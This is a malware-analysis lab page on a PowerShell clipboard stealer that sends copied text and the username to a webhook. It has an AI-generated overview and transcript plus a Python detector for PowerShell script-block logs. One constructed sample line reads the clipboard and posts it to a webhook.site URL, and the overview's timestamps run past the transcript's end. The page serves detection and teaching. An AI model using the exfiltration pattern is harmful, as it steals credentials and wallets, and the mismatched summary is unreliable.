PowerShell Webhook Clipper - Malware Analysis Lab


Technical Analysis of a PowerShell Webhook Clipper

Overview (AI generated from video):

Summary

This PowerShell script steals clipboard content, including credentials and cryptocurrency wallets, by using native APIs to detect key presses and sending the data to a webhook.

Highlights

Timestamps

0:42 💻 The script adds Windows Presentation Foundation DLLs to create a graphical user interface.
2:12 ⚠️ The script continuously runs in the background, constantly monitoring clipboard activity.
4:38 🔒 By updating the webhook URL, the script can send stolen clipboard data to a controlled location.
6:53 📝 Any copied text, including passwords, is immediately sent to the specified webhook.
9:15 ❌ Certain file types may cause errors when copied, revealing the script’s activity.
11:26 📂 The script was tagged as “Posh C2,” but it’s not related to the actual Posh C2 framework.
12:19 🕵️‍♂️ The script was discovered on Pastebin and shared with the community for analysis.

Key Insights

📌 The script’s simplicity and effectiveness showcase the ingenuity of the attacker.
📌 Native APIs and PowerShell’s capabilities allow for easy clipboard monitoring and data exfiltration.
📌 The script’s use of a webhook enables the attacker to remotely receive stolen clipboard content.
📌 Users may unknowingly execute such a script without any prompt, making it more dangerous.
📌 The script demonstrates the importance of being cautious when copying sensitive information.
📌 Although the script is basic, it serves as a reminder of the potential risks associated with clipboard usage.
📌 The community’s collaboration in sharing and analyzing malware samples contributes to improved security measures.
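A detection-side example, added here and not taken from the video or from the analysed sample: the page's description (clipboard read, key-state check for Ctrl+C/Ctrl+X, POST to a hosted webhook) maps naturally onto PowerShell ScriptBlock logging (Windows Event ID 4104). The code below scores script-block text against those behaviours and flags the combination that matters, a clipboard read together with an outbound HTTP send. The indicator names, regexes, the sample event records and the `<placeholder-uuid>` webhook id are all assumptions constructed for illustration.

```python
"""Score PowerShell ScriptBlock log text for clipboard-exfiltration ("clipper") behaviour.

Assumption: input is the script text carried by Event ID 4104 records. The indicator
set and thresholds below are illustrative, not a vendor or project rule set.
"""
import re

# Each indicator is one behaviour the page describes. Regexes are constructed for this example.
INDICATORS = {
    # Clipboard read: the Get-Clipboard cmdlet the page mentions, plus .NET/WinForms equivalents
    "clipboard_read": re.compile(
        r"Get-Clipboard|\[System\.Windows\.Clipboard\]::GetText|Windows\.Forms\.Clipboard", re.I),
    # Outbound HTTP from PowerShell (Invoke-RestMethod is assumed; the page only says "post")
    "http_send": re.compile(
        r"Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient|\.UploadString\(", re.I),
    # Hosted webhook endpoints; the page names webhook.site and Discord webhooks
    "webhook_url": re.compile(
        r"https?://(?:discord(?:app)?\.com/api/webhooks/|webhook\.site/)", re.I),
    # Polling key state to catch Ctrl+C / Ctrl+X (WPF Keyboard class or Win32 key-state APIs)
    "key_poll": re.compile(
        r"GetAsyncKeyState|GetKeyState|Input\.Keyboard\]::IsKeyDown", re.I),
    # WPF / WinForms assemblies loaded into a console script (the page's "WPF DLLs")
    "gui_assembly": re.compile(
        r"Add-Type\s+-AssemblyName\s+(?:PresentationCore|PresentationFramework|System\.Windows\.Forms)", re.I),
}


def analyze_scriptblock(text):
    """Return the matched indicators and a verdict for one script block.

    clipboard_exfil: clipboard read combined with an HTTP send or a webhook URL.
    suspicious:      clipboard read combined with key-state polling but no send seen
                     (the send may sit in a different, separately logged block).
    benign:          anything else, including legitimate local clipboard use.
    """
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    if "clipboard_read" in hits and ("http_send" in hits or "webhook_url" in hits):
        verdict = "clipboard_exfil"
    elif "clipboard_read" in hits and "key_poll" in hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits}


def triage(events):
    """Map each event id to its verdict so an analyst can sort what to look at first."""
    return {event_id: analyze_scriptblock(text)["verdict"] for event_id, text in events.items()}


# Constructed sample records standing in for the ScriptBlockText field of 4104 events.
SAMPLE_EVENTS = {
    # Legitimate: clipboard saved to a local file, nothing leaves the host
    "evt-1": r"Get-Clipboard | Out-File -FilePath C:\notes\clip.txt",
    # Legitimate: HTTP call with no clipboard access
    "evt-2": "Invoke-RestMethod -Uri 'https://intranet.example/api/health' -Method Get",
    # Matches the page's description: username from the environment, clipboard body, hosted webhook
    "evt-3": ("$hookUrl = 'https://webhook.site/<placeholder-uuid>'; "
              "$body = @{ username = $env:USERNAME; content = (Get-Clipboard -Raw) }; "
              "Invoke-RestMethod -Uri $hookUrl -Method Post -Body $body"),
    # Key-state check plus clipboard read, send not in this block
    "evt-4": ("Add-Type -AssemblyName PresentationCore; "
              "if ([System.Windows.Input.Keyboard]::IsKeyDown('LeftCtrl') -and "
              "[System.Windows.Input.Keyboard]::IsKeyDown('C')) { $clip = Get-Clipboard }"),
}

if __name__ == "__main__":
    for event_id, verdict in triage(SAMPLE_EVENTS).items():
        print(event_id, verdict, analyze_scriptblock(SAMPLE_EVENTS[event_id])["indicators"])
```

The point of requiring two behaviours before raising `clipboard_exfil` is precision: `Get-Clipboard` on its own is common in admin scripts, and `Invoke-RestMethod` on its own is everywhere. The `suspicious` tier exists because ScriptBlock logging splits long scripts into several 4104 records, so the send and the clipboard read can land in different events; correlate by the ScriptBlock id or process before closing such a hit as benign.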

Transcript (AI generated from video):

00:00:01	What if I told you that this PowerShell script of only 36 lines could steal your credentials, your cryptocurrency wallets, and anything else that you might copy to your clipboard? Although it's so rudimentary and primitive, it works, and there's just something about that that you have to admire and marvel at the brilliance of. So let's take a look at how simple this clip functions. This Clipper is using PowerShell, and what it's doing is adding .NET assemblies. Now these DLLs that it is using within its script are from the
00:00:44	Windows Presentation Foundation DLLs, things that are used for when you're creating a .NET application, giving you a graphical user interface. Now why would it need to use these? I'll show you in just a bit. First off, let's look at this function dis chat. dis chat is taking a parameter given, which is content, and then it's also defining a hook URL. Now this is where the data is going to be sent to. It's defining a username, and that is taking the username from your operating system environment variable, so it's getting your username
00:01:25	for the computer system. It's then taking the content and posting all this to that hook URL. What it's doing here under dis chat, when it runs, straight away when it runs, it's going to get the contents of your clipboard and post it to that webhook. Then "while one", which basically means while true, and considering there's nothing to define it not as true, it will always be running. So while this is running it's defining a few different variables: your left control, your right control, your C and your X key. Now at
00:02:01	first I didn't think there was anything too remarkable about this, and yet I still don't think that there's anything too remarkable about this, and that's the beauty of it. It's just using the native APIs to detect whether you have your control key down, and then whether you have your C or X key down for copy or cut, and if you do it's going to invoke that method and post it off to the webhook, thus taking the contents of your clipboard and sending it somewhere else. So I'm going to take this script and
00:02:39	update the hook URL to something that I control. In this particular case I'm going to change it from webhook.site to a particular Discord webhook that I have set up, and if I go and update this webhook to it, now what I can do is save this script and actually just see whether it functions, right? And what we start getting into our Discord channel... make sure that we can see what's in our Discord channel first, and now run the script with PowerShell. And my security settings might actually be set up so this
00:03:19	asks me to allow the script to run, but in a lot of cases, depending on how this is being deployed, you're not going to have that prompt and it's just going to run. It could actually be that this is just functioning now, yeah, without any kind of restriction. Well, you can already see, I didn't even notice, but it's already sent the webhook that was in my clipboard off to our Discord server. You can see it's been sent as Barry, which is the username on this particular system. So let's make sure that it works if we use
00:03:50	any of our keyboard shortcuts. I'm going to just open up Notepad and maybe just type something like, yeah, "this is super secret credentials and to access crypto wallets", and let's say I needed this and I used the old Ctrl+C, or Ctrl+X. Sorry, in that particular case I actually hit Ctrl+V to paste, so that was stupid. But let's say I actually want to do this and I have to copy this, copy that to clipboard. Oh, it's there. What if I cut this? Oh, it's there, almost immediately. What if I copy
00:04:37	this file? Nothing happens. If I Ctrl+C the file, you'll see a big error message on the particular script, because what the Get-Clipboard module in PowerShell is doing is only supportive for plain text strings, or just strings in general, right? But anything that we copy in that particular regard, let's say it's a password, we take this, yep, we take this. We've kind of proven the fact, right, that everything we copy is winding up in this Discord channel. So this is something to be aware of, something that's a bit
00:05:13	interesting, and I thought it was kind of cool that no matter how primitive this PowerShell script is, it functions. You don't have to stand up any kind of infrastructure. So I will say the sample was downloaded by MalwareBazaar, and it was uploaded by Paul, who found it on Pastebin, so thanks so much for sharing that with the community, Paul. I will say that it was tagged up as Posh C2, I believe this is from a YARA rule, and it's not actually the Posh C2 framework. There's "PowerShell webhook keylogger", which
00:05:47	I guess is an app's name. I mean, a PowerShell webhook Clipper might be slightly more accurate, but nonetheless it kind of gives the idea of what this script is intending to do. So there you go, take a look at it and let me know what you think.